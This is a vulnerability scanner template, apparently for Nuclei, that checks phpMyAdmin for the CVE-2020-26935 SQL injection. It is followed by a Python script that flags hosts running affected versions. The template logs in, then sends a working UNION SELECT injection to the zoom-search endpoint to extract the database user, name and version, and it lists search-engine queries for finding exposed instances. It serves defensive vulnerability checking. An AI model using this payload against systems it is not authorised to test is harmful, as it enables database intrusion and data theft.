Vulnerability description
phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL; exploitation requires crafted search input.
id: CVE-2020-26935

info:
  name: phpMyAdmin < 5.0.3 - SQL Injection
  author: 0x_Akoko
  severity: critical
  description: |
    phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2020-6/
    - https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26935
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26935
    epss-score: 0.87812
    epss-percentile: 0.9945
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 4
    shodan-query: http.title:"phpMyAdmin"
    fofa-query: app="phpMyAdmin"
  tags: cve,cve2020,phpmyadmin,sqli,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "phpMyAdmin", "name=\"token\"")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="token" value="([^"]+)"'
        internal: true

      - type: regex
        name: set_session
        part: body
        group: 1
        regex:
          - 'name="set_session" value="([^"]+)"'
        internal: true

  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pma_username={{username}}&pma_password={{password}}&server=1&target=index.php&token={{token}}&set_session={{set_session}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "pmaAuth-1=")
        condition: and
        internal: true

  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "logged_in:true")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: token2
        part: body
        group: 1
        regex:
          - 'token:"([^"]+)"'
        internal: true

  - raw:
      - |
        POST /tbl_zoom_select.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        db=testdb&table=users&where_clause=1=0 UNION SELECT 1,CONCAT(USER(),0x3a,DATABASE(),0x3a,VERSION()),3-- -&where_clause_sign=&token={{token2}}&ajax_request=true&get_data_row=true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "\"success\":true", "\"row_info\"")
        condition: and

    extractors:
      - type: regex
        name: sqli_data
        part: body
        group: 1
        regex:
          - '"username":"([^"]+)"'
# digest: 4a0a00473045022100d1e4d471f4dbdde08855076cc8fb81cfe25be3818c01572fe60add3288ce038f02206114ec31c566253a7f0435e884fb10f85d3ba90f23b28ab45df2dffb8a735886:922c64590222798bb761d5b6d8e72950
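The remediation field above gives the two fixed releases (4.9.6 for the 4.x line, 5.0.3 for the 5.x line). The following Python snippet is an added example for this page, not part of the Nuclei template or of phpMyAdmin: it turns those fixed versions into an exposure check that an administrator can run against an inventory of reported version strings, without touching the instances themselves. The host names and versions in INVENTORY are constructed sample data.

```python
"""Triage helper for CVE-2020-26935 (PMASA-2020-6).

Affected: phpMyAdmin before 4.9.6, and 5.x before 5.0.3.
Added illustration for this page; not the template's or project's code.
"""
import re
from typing import Dict, Tuple

# Fixed releases named in the advisory / remediation field.
FIXED_4X = (4, 9, 6)
FIXED_5X = (5, 0, 3)


def parse_version(text: str) -> Tuple[int, ...]:
    """Extract the leading dotted numeric version from a reported string.

    '5.0.2-dev' -> (5, 0, 2); '5.0' is padded to (5, 0, 0) so that
    tuple comparison against the three-part fixed versions is sound.
    """
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"not a version string: {text!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    return parts + (0,) * (3 - len(parts))


def is_affected(version: str) -> bool:
    """True when the version lies in either affected range."""
    v = parse_version(version)
    if v < FIXED_4X:                     # everything before 4.9.6
        return True
    if v[0] == 5 and v < FIXED_5X:       # 5.0.0 .. 5.0.2
        return True
    return False


def remediation_target(version: str) -> str:
    """Minimum fixed release on the same major line (advisory values)."""
    return "5.0.3" if parse_version(version)[0] >= 5 else "4.9.6"


# Constructed sample inventory: host -> phpMyAdmin version as reported by
# the instance owner (e.g. from the package manager or the footer string).
INVENTORY: Dict[str, str] = {
    "dbadmin-01.example.internal": "4.9.5",
    "dbadmin-02.example.internal": "4.9.6",
    "dbadmin-03.example.internal": "5.0.2-dev",
    "dbadmin-04.example.internal": "5.0.3",
    "dbadmin-05.example.internal": "5.1.0",
}


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Return only the exposed hosts, each mapped to the release to move to."""
    return {
        host: remediation_target(ver)
        for host, ver in inventory.items()
        if is_affected(ver)
    }


if __name__ == "__main__":
    for host, target in sorted(triage(INVENTORY).items()):
        print(f"{host}: affected, update to >= {target}")
```

Only the two hosts still on 4.9.5 and 5.0.2 are reported; 4.9.6, 5.0.3 and 5.1.0 are at or past the fixed releases. A version check like this complements the template rather than replacing it: the template confirms the flaw is reachable on an instance you hold credentials for, while the inventory check finds every instance that needs the update, including ones the scanner cannot log in to.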